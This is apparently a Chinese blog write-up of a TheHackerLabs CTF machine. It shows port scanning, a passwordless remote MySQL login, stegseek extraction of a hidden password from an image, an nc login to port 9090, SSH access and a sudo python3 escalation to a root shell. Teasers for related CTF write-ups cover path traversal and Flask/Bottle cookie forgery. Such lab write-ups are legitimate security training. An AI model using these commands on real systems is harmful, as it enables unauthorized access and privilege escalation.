TheHackerLabs_HEXTHINK_Writeup
nmap 端口扫描
22
80
3306
9090
访问 web 80
页显示错误和可能的用户 ctf_user
目录扫描,发现 phpinfo 信息其他无信息
尝试用 ctf_user 远程连接数据库,无密码登陆成功
mysql -h $IP -u ctf_user --skip-ssl
DBeaver 远程连接数据库
查到用户表,内有账号和md5密码值,不过这是网站的用户,没什么用
继续翻表,新闻表里有文字,提示“你已经走了很远了,但还有很远的路要走”
数据内容为 jpg 图片,导出为文件
拖入 010,可以看到内容分层,存在隐藏文件信息
stegseek imagen.jpg rockyou.txt
提取出隐藏文件,得到一个密码和提示
![[Pasted image 20250726215513.png]]
根据提示,nc 打通 9090 端口
1 | echo -e "LOGIN whisper\nKEY whisper9090" | nc 10.0.2.16 9090 |
echo -e 将 \n 解释为换行符。
ssh 登录到 whisper 用户成功,得到用户 flag
sudo -l 有 python3
sudo python3 -c 'import pty, os; os.execv("/bin/bash", ["bash"])' 提权成功
-c:表示后面跟着的是一个要执行的 Python 命令(code)。
All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.
Related Articles
2025-07-24
Labs_NodeCeption_neuro
外部打点arp-scan -l 12345678910111213┌──(root㉿kali)-[~]└─# arp-scan -lInterface: eth0, type: EN10MB, MAC: 00:0c:29:74:07:c6, IPv4: 192.168.0.9Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.0.1 30:3f:7b:d5:aa:de Shenzhen YOUHUA Technology Co., Ltd192.168.0.8 2c:9c:58:8e:96:a5 (Unknown)192.168.0.12 08:00:27:08:28:cf PCS Systemtechnik GmbH192.168.0.4 f2:13:09:db:48:25 (Unknown: locally administered)192.168.0.2 ...
2025-07-24
XYCTF_2025_Signin_(Bottle框架Pickle反序列化+路径穿越)
首先代码审计,这是一个利用 Bottle 写的 Web 框架。 /download 支持下载文件,作了路径穿越过滤 /secret 进行了 guest 和 admin 的认证,用了 session = request.get_cookie("name", secret=secret) 而源码里告诉了路径 ../../secret.txt 也就是说可以用 secret.txt 对 cookie 进行伪造 根据提示,有反序列化的过程,session 认后也没有其他可用功能,于是去看 bottle 如何解析cookie 看到他的 get_cookie 123456789101112131415161718192021222324252627282930313233def get_cookie(self, key, default=None, secret=None, digestmod=hashlib.sha256): """ Return the content of a cookie. To read a...
2025-07-22
catcat-new(文件读取内存 + flaskSession 伪造)
点击猫猫信息看到文件读取功能 环境变量里没有 1http://61.147.171.103:60316/info?file=../../../../proc/self/environ /proc/self/cmdline,用于获取当前启动进程的完整命令 得到 b’python\x00app.py\x00’ 再次读取上级目录的 ../app.py app是个Flask对象,而secret...
2025-04-15
XYCTF2024复现
warm up123456789101112131415161718192021222324252627<?phpinclude 'next.php';highlight_file(__FILE__);$XYCTF = "Warm up";extract($_GET);if (isset($_GET['val1']) && isset($_GET['val2']) && $_GET['val1'] != $_GET['val2'] && md5($_GET['val1']) == md5($_GET['val2'])) { echo "ez" . "<br>";} else { die("什么情况,这么基础的md5做不来");}if...
2025-07-22
ez_curl(http-header格式解析 + exprees 请求参数截断)
首先看 js 的 express 框架 12345678910111213app.get('/flag', (req, res) => { if(!req.query.admin.includes('false') && req.headers.admin.includes('true')){ res.send(flag); }else{ res.send('try hard'); }}); 必须满足查询参数中不包含 flase,请求头有 admin:true (这里的请求头是 post 中的请求头) 再看 web php 代码 $input = file_get_contents('php://input'); 这里是直接获取的 post 内容 $headers = (array)json_decode($input)->headers; 将一个...
